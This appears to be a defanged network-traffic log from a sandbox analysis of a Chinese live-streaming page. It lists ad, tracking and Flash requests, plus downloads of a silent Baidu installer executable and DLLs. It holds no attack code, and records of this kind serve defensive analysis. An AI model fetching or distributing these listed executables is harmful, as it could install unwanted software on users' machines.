hxxp://www-google-analytics.l.google.com/analytics.js
hxxp://hm.e.shifen.com/hm.js?e52aa1ba5cd407a52e95d6c7249929a9
hxxp://cb.e.shifen.com/ecom?di=u1537509&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=1&dds=&drs=3&dvi=1401358918&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&liu=&ltr=&lcr=&ps=-2x-2&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=156&tlm=1398686606&tcn=1402680537&tpr=1402680537275&dpt=none&coa=&baidu_id=
hxxp://cb.e.shifen.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4&ltr=&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=cadbaab171a45209&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509
hxxp://cb.e.shifen.com/ecom?di=u1537511&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=2&dds=&drs=3&dvi=1401358918&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&liu=&ltr=&lcr=&ps=-2x-2&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=5703&tlm=1398686606&tcn=1402680543&tpr=1402680537275&dpt=none&coa=&baidu_id=
hxxp://cpro.e.shifen.com/extra/text_flash/AC_RunActiveContent.js
hxxp://cb.e.shifen.com/ecom?cec=utf-8&dai=2&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4&ltr=&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=6dc8052231d438f7&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537511&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537511
hxxp://bcs.jomodns.com/sw-search-sp/client/dlljg1/BDMNet.dll
hxxp://cb.e.shifen.com/ecom?di=u1537506&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=3&dds=&drs=3&dvi=1401358918&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&liu=&ltr=&lcr=&ps=357x3&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=7875&tlm=1398686606&tcn=1402680545&tpr=1402680537275&dpt=none&coa=&baidu_id=
hxxp://wn.pos.e.shifen.com/adx.php?c=cz02MmI3NTk5ZjZjMTdkY2E3AHQ9MTQwMjY4MDUzOABzZT0xAGJ1PTEAcHJpY2U9VTVzMDJnQUpWTTk3akVwZ1c1SUE4blJ3dWx0ZnZPbGs3Mi1QNkEAY2htZD0xAHY9MQBpPTMyODcwZjY0
hxxp://cpro.e.shifen.com/img/cpro_media_small.png
hxxp://ubmcmm.jomodns.com/media/v1/0f000DEUfQYMcAovJj_RMf.swf?url_type=1&snapshot=&
hxxp://cb.e.shifen.com/ecom?cec=utf-8&dai=3&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=728&rsi1=90&rsi5=4&ltr=&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680537275&lunum=6&ch=0&at=6&qn=18a90fef6d4567e7&ps=357x3&tn=text_default_728_90&ts=1&td_id=1537506&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537506
hxxp://wn.pos.e.shifen.com/adx.php?c=cz03YzllNGFlNjgyYWRkZWM0AHQ9MTQwMjY4MDU0MgBzZT0xAGJ1PTEAcHJpY2U9VTVzMDNnQUdncGw3akVwZ1c1SUE4cG9KTkw2cDBXXzk0TVVzV1EAY2htZD0xAHY9MQBpPWI1MjVhM2Nj
hxxp://wn.pos.e.shifen.com/adx.php?c=cz1hNGE2OWU2ZDI4YTg5MmU5AHQ9MTQwMjY4MDUzNQBzZT0xAGJ1PTEAcHJpY2U9VTVzMDF3QUl1R2Q3akVwZ1c1SUE4bF9TM3prZUV0OWt2a1hWb2cAY2htZD0xAHY9MQBpPTQxNTVkMTA2
hxxp://cpro.e.shifen.com/sync.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1
hxxp://ubmcmm.jomodns.com/media/v1/0f0000mUMSYcE3MmsKSaAf.swf?url_type=1&snapshot=&
hxxp://cb.e.shifen.com/sync_pos.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1
hxxp://hm.e.shifen.com/h.js?d1117fa0662883e59acd91ed0f03b7eb
hxxp://www-google-analytics.l.google.com/collect?v=1&_v=j22&a=66525772&t=pageview&_s=1&dl=http://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null&dr=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=&ul=en-us&de=utf-8&dt=风云直播MINI&sd=32-bit&sr=1276x846&vp=1010x550&je=0&fl=11.6 r602&_u=ME~&cid=2131950969.1402680550&tid=UA-42145803-1&z=1816808476
hxxp://hm.e.shifen.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=2006558277&si=d1117fa0662883e59acd91ed0f03b7eb&st=1&v=1.0.59&lv=1&tt=五金
hxxp://hm.e.shifen.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=185369738&si=e52aa1ba5cd407a52e95d6c7249929a9&st=3&su=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=&v=1.0.59&lv=1&tt=风云直播MINI
hxxp://ubmcmm.jomodns.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_555383237=media/v1/0f000DYlKNGeiuam3jyYls.swf&id_555316139=media/v1/0f000Z60Ab17JZtxZIQVnf.swf&id_555319614=media/v1/0f000AY4Gp2TGCsxgDBTq0.swf&id_555319634=media/v1/0f000AY4GuJTGCsxgDBTe0.swf&id_555319654=media/v1/0f0002dsZcSR_Ik2MbXxf0.swf&id_555319666=media/v1/0f000Z60AW17JZtxZIQVsf.png&id_555316223=media/v1/0f000KQDyCuvJFLfvix_cf.png&id_555383389=media/v1/0f0000vLC1Ofnh0LFprLSs.swf&id_555316259=media/v1/0f000c60Ma_q1Fr10rMvif.gif&id_555194204=media/v1/0f0002dsZ58R_Ik2MbXxd0.jpg&snapshot=&
hxxp://static.n.shifen.com/hmt/icon/21.gif
hxxp://resource.kukuplay.com/players/players.php 223.202.47.69
hxxp://drmcmm.e.shifen.com/media/id=PWRkPj6&gp=10&time=nHcdPHDsnHD4nf.png
hxxp://cb.e.shifen.com/wh/o.htm?ltr=&cf=u
hxxp://ubmcmm.jomodns.com/media/v1/0f000DYlKNGeiuam3jyYls.swf
hxxp://cbjs.e.shifen.com/tpl/wh.js
hxxp://ubmcmm.jomodns.com/media/v1/0f000Z60Ab17JZtxZIQVnf.swf
hxxp://ubmcmm.jomodns.com/media/v1/0f000rmn6cn7D14hDeZLyf.gif
hxxp://ubmcmm.jomodns.com/media/v1/0f000AY4Gp2TGCsxgDBTq0.swf
hxxp://1st.xdwscache.glb0.lxdns.com/players/2014/05/23/60130//fengyun.swf
hxxp://ubmcmm.jomodns.com/media/v1/0f0002dsZcSR_Ik2MbXxf0.swf
hxxp://ubmcmm.jomodns.com/media/v1/0f000Z60AW17JZtxZIQVsf.png
hxxp://control.www.kukuplay.com/crossdomain.xml
hxxp://dft.nb.fengyunzhibo.com/crossdomain.xml
hxxp://control.www.kukuplay.com/SrcManager/dynchannelproperty?p=player&home=false&cid=693619_1371525642501&ptype=null&version=2.2.8.52867&rd=3809140.0312259793&from=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=
hxxp://dft.nb.fengyunzhibo.com/SrcManager/getchannelproperty/693619_1371525642501?fields=sname,lastSplitTime,cname,width,height,output&version=2.2.8.52867&rd=985027.0906463265
hxxp://ubmcmm.jomodns.com/media/v1/0f000KQDyCuvJFLfvix_cf.png
hxxp://dft.nb.fengyunzhibo.com/getMyVersion
hxxp://ubmcmm.jomodns.com/media/v1/0f000AY4GuJTGCsxgDBTe0.swf
hxxp://ubmcmm.jomodns.com/media/v1/0f0000vLC1Ofnh0LFprLSs.swf
hxxp://ubmcmm.jomodns.com/media/v1/0f000c60Ma_q1Fr10rMvif.gif
hxxp://resource.kukuplay.com/crossdomain.xml 223.202.47.69
hxxp://player.log.kukuplay.com/crossdomain.xml 124.228.254.106
hxxp://ubmcmm.jomodns.com/media/v1/0f0002dsZ58R_Ik2MbXxd0.jpg
hxxp://resource.kukuplay.com/upload/fishrlv31.swf 223.202.47.69
hxxp://player.log.kukuplay.com/report.gif?act=pv&ver=nor&app=player&url=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=&cid=fengyun_693619_1371525642501&host=tv.aiqingzhihui.com&device=pc&localId=1402680558.822_176117610932921373056&rd=0.27252255426719785 124.228.254.106
hxxp://sxcdn.fengyunzhibo.com/play/?f=fengyunzhibo.com&c=693619_1371525642501
hxxp://dft.nb.fengyunzhibo.com/SrcManager/ForbiddenTiming?op=getjson&types=comment&cid=693619_1371525642501&host=tv.aiqingzhihui.com
hxxp://sxcdn.kukuplay.com/crossdomain.xml
hxxp://player.log.kukuplay.com/report.gif?act=load&ver=nor&app=player&url=http://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=&cid=fengyun_693619_1371525642501&host=tv.aiqingzhihui.com&device=pc&localId=1402680558.822_176117610932921373056&rd=0.29551827581599355 124.228.254.106
hxxp://dft.nb.fengyunzhibo.com/SrcManager/channelInfo?fields=cname,pic1,url1&cid=693619_1371525642501
hxxp://dft.nb.fengyunzhibo.com/SrcManager/roominfo?cid=693619_1371525642501&rid=null&rd=0.09363483125343919
hxxp://hm.e.shifen.com/h.js?7aa2cb65324b0d2de0102de5dc741760
hxxp://sxcdn.kukuplay.com/csplayer/csplayer15s0319.aspx
hxxp://sxcdn.kukuplay.com/xvideo/xvideo15s140529.aspx
hxxp://xnop017.tlgslb.com/upload/fishrlv31.swf
hxxp://dft.nb.fengyunzhibo.com/SrcManager/channelInfo?fields=online&cid=693619_1371525642501
hxxp://hm.e.shifen.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&et=0&fl=11.6&ja=1&ln=en-us&lo=0&nv=1&rnd=1330501783&si=7aa2cb65324b0d2de0102de5dc741760&st=3&su=http://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null&v=1.0.59&lv=1&tt=风云直播
hxxp://swwx.n.shifen.com/go/full/1/70745
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe
hxxp://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0 14.33.133.118
hxxp://hm.e.shifen.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&ep=16047,16047&et=3&fl=11.6&ja=1&ln=en-us&lo=0&nv=0&rnd=440269574&si=d1117fa0662883e59acd91ed0f03b7eb&st=4&v=1.0.59&lv=1&tt=五金
hxxp://cb.e.shifen.com/ecom?di=u1537509&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=1&dds=&drs=3&dvi=1401358918&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&liu=&ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&lcr=&ps=-2x-2&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=593&tlm=1398686606&tcn=1402680568&tpr=1402680568181&dpt=none&coa=&baidu_id=
hxxp://xnop017.tlgslb.com/crossdomain.xml
hxxp://cb.e.shifen.com/ecom?cec=utf-8&dai=1&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4&ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=b4429549b809eb77&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537509&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537509
hxxp://cb.e.shifen.com/ecom?di=u1537511&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=2&dds=&drs=3&dvi=1401358918&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&liu=&ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&lcr=&ps=-2x-2&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=1468&tlm=1398686606&tcn=1402680569&tpr=1402680568181&dpt=none&coa=&baidu_id=
hxxp://wn.pos.e.shifen.com/adx.php?c=cz04MTYzYzM2MjIwOTk5NGQ0AHQ9MTQwMjY4MDU2MwBzZT0xAGJ1PTEAcHJpY2U9VTVzMDh3QUt5cGw3akVwZ1c1SUE4bE96U3c1YlJwdW92NE1GdVEAY2htZD0xAHY9MQBpPTk3NzI2MzQ1
hxxp://cb.e.shifen.com/ecom?cec=utf-8&dai=2&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=336&rsi1=280&rsi5=4&ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=791141dc1b3cdefb&ps=-2x-2&tn=text_default_336_280&ts=1&td_id=1537511&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537511
hxxp://eclick.e.shifen.com/a.js?did=2&ch=0&jk=6dc8052231d438f7&tn=text_default_336_280&n=67025059_1_cpr&js=c&tu=u1537511&word=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&if=0&aw=0&ah=0&dt=1402680541&pt=23078&ps=20140613082903666&it=16391&vs=1&vt=16391&ft=23078&op=100&csp=1276,818&bcl=758,450&pof=758,493&top=-2&left=-2&fs=1&total=3&rdm=1402680566775
hxxp://eclick.e.shifen.com/a.js?did=1&ch=0&jk=cadbaab171a45209&tn=text_default_336_280&n=67025059_1_cpr&js=c&tu=u1537509&word=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&if=0&aw=0&ah=0&dt=1402680541&pt=26063&ps=20140613082900681&it=15891&vs=1&vt=15891&ft=26063&op=100&csp=1276,818&bcl=758,450&pof=758,493&top=-2&left=-2&fs=1&total=3&rdm=1402680566744
hxxp://eclick.e.shifen.com/a.js?did=3&ch=0&jk=18a90fef6d4567e7&tn=text_default_728_90&n=67025059_1_cpr&js=c&tu=u1537506&word=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&if=0&aw=739&ah=90&dt=1402680541&pt=19141&ps=20140613082907603&it=16391&vs=1&vt=16391&ft=19141&op=100&csp=1276,818&bcl=758,450&pof=758,493&top=357&left=3&fs=1&total=3&rdm=1402680566806
hxxp://cb.e.shifen.com/ecom?di=u1537506&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=3&dds=&drs=3&dvi=1401358918&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&liu=&ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&lcr=&ps=357x3&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=2671&tlm=1398686606&tcn=1402680570&tpr=1402680568181&dpt=none&coa=&baidu_id=
hxxp://weibo.com/aj/static/sync.html?t=1402680571713 180.149.134.141
hxxp://wn.pos.e.shifen.com/adx.php?c=cz1hYjk2NDU4YTc5YTgwY2Y5AHQ9MTQwMjY4MDU2NABzZT0xAGJ1PTEAcHJpY2U9VTVzMDlBQU9xSDE3akVwZ1c1SUE4aDVGVHFhWkVBLThXVUlIeEEAY2htZD0xAHY9MQBpPThiZTBkNzI2
hxxp://s.cpro.e.shifen.com/s.htm?cproid=49F93F86C60D03A8D23F3919153C48A7&t=1402680571713
hxxp://cb.e.shifen.com/sync_pos.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1&t=1402680571713
hxxp://cb.e.shifen.com/ecom?cec=utf-8&dai=3&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=728&rsi1=90&rsi5=4&ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=0420a4ea8165ad22&ps=357x3&tn=text_default_728_90&ts=1&td_id=1537506&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537506
hxxp://hm.e.shifen.com/hm.gif?cc=1&ck=1&cl=32-bit&ds=1276x846&et=0&fl=11.6&ja=1&ln=en-us&lo=0&lt=1402680551&nv=0&rnd=1753329783&si=d1117fa0662883e59acd91ed0f03b7eb&st=4&su=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&v=1.0.59&lv=2
hxxp://ubmcmm.jomodns.com/media/v1/0f0005DLCKKC2jqXKT7t1s.swf?url_type=1&id_433067180=media/v1/0f000KLx1mYZLI-ed9V_os.jpg&id_488077750=media/v1/0f000jtT4CGxjFHdyV6mBf.swf&id_283204763=media/v1/0f000QfY4TDI-RZtJ88Rf0.png&id_488102405=media/v1/0f000Qb3PMHRPyvfvvYfG6.swf&id_425012365=media/v1/0f000KXFAo9s7mobL64F3f.swf&id_451157897=media/v1/0f000AV1EG-sYD_d7YFHc6.jpg&id_488069842=media/v1/0f000AV1EJPWogCd7YFH9s.swf&snapshot=&
hxxp://wn.pos.e.shifen.com/adx.php?c=cz03MWUzZWY1YjIzZTYyNTUxAHQ9MTQwMjY4MDU2OQBzZT0xAGJ1PTEAcHJpY2U9VTVzMC1RQUVSRjU3akVwZ1c1SUE4czZqSHN0S3pQd0g2emVBTEEAY2htZD0xAHY9MQBpPTEzNDIwOTJh
hxxp://cb.e.shifen.com/wh/o.htm?ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&cf=u
hxxp://dft.nc.fengyunzhibo.com/crossdomain.xml
hxxp://ubmcmm.jomodns.com/media/v1/0f000KLx1mYZLI-ed9V_os.jpg
hxxp://ubmcmm.jomodns.com/media/v1/0f000jtT4CGxjFHdyV6mBf.swf
hxxp://ubmcmm.jomodns.com/media/v1/0f000Qb3PMHRPyvfvvYfG6.swf
hxxp://ubmcmm.jomodns.com/media/v1/0f000QfY4TDI-RZtJ88Rf0.png
hxxp://ubmcmm.jomodns.com/media/v1/0f000KXFAo9s7mobL64F3f.swf
hxxp://dft.nc.fengyunzhibo.com/RequestTiming/rt?cid=693619_1371525642501&host=tv.aiqingzhihui.com&player_type=nor&rd=0.1444191988557577&newrandom=0.0995170371606946
hxxp://ubmcmm.jomodns.com/media/v1/0f000AV1EG-sYD_d7YFHc6.jpg
hxxp://1st.xdwscache.glb0.lxdns.com/plugins/requestviewrlv10.swf
hxxp://resource.kukuplay.com/upload/logoyanyi.FLV 223.202.47.69
hxxp://xnop017.tlgslb.com/upload/logoyanyi.FLV
hxxp://resource.kukuplay.com/upload/mobileAds4.swf 223.202.47.69
hxxp://www.mnh.quzhao.com/x/mnh/right/409/?spid=-37237366455960 14.33.133.118
hxxp://sxcdn.fengyunzhibo.com/ok/?f=fengyunzhibo.com&c=693619_1371525642501
hxxp://xnop017.tlgslb.com/upload/mobileAds4.swf
hxxp://www.mnh.quzhao.com/x/mnh/right/409/* 14.33.133.118
hxxp://ubmcmm.jomodns.com/media/v1/0f000AV1EJPWogCd7YFH9s.swf
hxxp://player.log.kukuplay.com/report.gif?id=1389688318801&app=ad&type=tiepian&code=im&cid=fengyun_693619_1371525642501&host=tv.aiqingzhihui.com&device=pc&localId=1402680558.822_176117610932921373056&rd=0.7170623573474586 124.228.254.106
hxxp://ubmcmm.baidustatic.com/media/v1/0f000DYlKNGeiuam3jyYls.swf 183.60.131.49
hxxp://ubmcmm.baidustatic.com/media/v1/0f0000mUMSYcE3MmsKSaAf.swf?url_type=1&snapshot=& 183.60.131.49
hxxp://ad.log.kukuplay.com/crossdomain.xml 124.228.254.106
hxxp://cp.sm.kukuplay.com/crossdomain.xml 60.214.208.202
hxxp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe 8.37.234.12
hxxp://dlsw.baidu.com/sw-search-sp/client/dlljg1/BDMNet.dll 61.155.165.27
hxxp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go= 125.39.21.36
hxxp://dup.baidustatic.com/tpl/wh.js 123.125.65.120
hxxp://cpro.baidu.com/extra/text_flash/AC_RunActiveContent.js 123.125.70.108
hxxp://pos.baidu.com/ecom?cec=utf-8&dai=3&cfv=11&cpa=1&col=en-us&dis=0&xuanting=0&n=67025059_1_cpr&conOP=0&scale=&skin=&rsi0=728&rsi1=90&rsi5=4&ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&pcs=758x450&rss0=#FFFFFF&rss1=#FFFFFF&rss2=#0000FF&rss3=#444444&rss4=#008000&rss5=&rss6=#e10900&rss7=&rad=&pis=10000x10000&aurl=&psr=1276x846&pss=758x493&tpr=1402680568181&lunum=6&ch=0&at=6&qn=0420a4ea8165ad22&ps=357x3&tn=text_default_728_90&ts=1&td_id=1537506&adn=3&cad=1&ccd=32&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u1537506 123.125.115.99
hxxp://pos.baidu.com/ecom?di=u1537511&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=2&dds=&drs=3&dvi=1401358918&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?1?id=0&liu=&ltr=http://www.mnh.quzhao.com/x/mnh/mini/q428/mnh_428cc.html&lcr=&ps=-2x-2&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=1&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=1468&tlm=1398686606&tcn=1402680569&tpr=1402680568181&dpt=none&coa=&baidu_id= 123.125.115.99
hxxp://eclick.baidu.com/a.js?did=3&ch=0&jk=18a90fef6d4567e7&tn=text_default_728_90&n=67025059_1_cpr&js=c&tu=u1537506&word=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&if=0&aw=739&ah=90&dt=1402680541&pt=19141&ps=20140613082907603&it=16391&vs=1&vt=16391&ft=19141&op=100&csp=1276,818&bcl=758,450&pof=758,493&top=357&left=3&fs=1&total=3&rdm=1402680566806 123.125.115.164
hxxp://pos.baidu.com/sync_pos.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1&t=1402680571713 123.125.115.99
hxxp://pos.baidu.com/ecom?di=u1537511&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=2&dds=&drs=3&dvi=1401358918&ltu=http://www.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&liu=&ltr=&lcr=&ps=-2x-2&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=5703&tlm=1398686606&tcn=1402680543&tpr=1402680537275&dpt=none&coa=&baidu_id= 123.125.115.99
hxxp://eiv.baidu.com/hmt/icon/21.gif 115.239.211.92
hxxp://dlsw.baidu.com/sw-search-shadu/client/dllv4/BDMReport.dll 61.155.165.27
hxxp://statistics.m0lxcdn.kukuplay.com/play/?f=fengyunzhibo.com&c=693619_1371525642501 223.82.254.40
hxxp://ubmcmm.baidustatic.com/media/v1/0f000rmn6cn7D14hDeZLyf.gif 183.60.131.49
hxxp://ubmcmm.baidustatic.com/media/v1/0f000KQDyCuvJFLfvix_cf.png 183.60.131.49
hxxp://resource.dl.kukuplay.com/upload/mobileAds4.swf 122.228.251.106
hxxp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_555383237=media/v1/0f000DYlKNGeiuam3jyYls.swf&id_555316139=media/v1/0f000Z60Ab17JZtxZIQVnf.swf&id_555319614=media/v1/0f000AY4Gp2TGCsxgDBTq0.swf&id_555319634=media/v1/0f000AY4GuJTGCsxgDBTe0.swf&id_555319654=media/v1/0f0002dsZcSR_Ik2MbXxf0.swf&id_555319666=media/v1/0f000Z60AW17JZtxZIQVsf.png&id_555316223=media/v1/0f000KQDyCuvJFLfvix_cf.png&id_555383389=media/v1/0f0000vLC1Ofnh0LFprLSs.swf&id_555316259=media/v1/0f000c60Ma_q1Fr10rMvif.gif&id_555194204=media/v1/0f0002dsZ58R_Ik2MbXxd0.jpg&snapshot=& 183.60.131.49
hxxp://resource.redirect.kukuplay.com/upload/logoyanyi.FLV 223.202.47.69
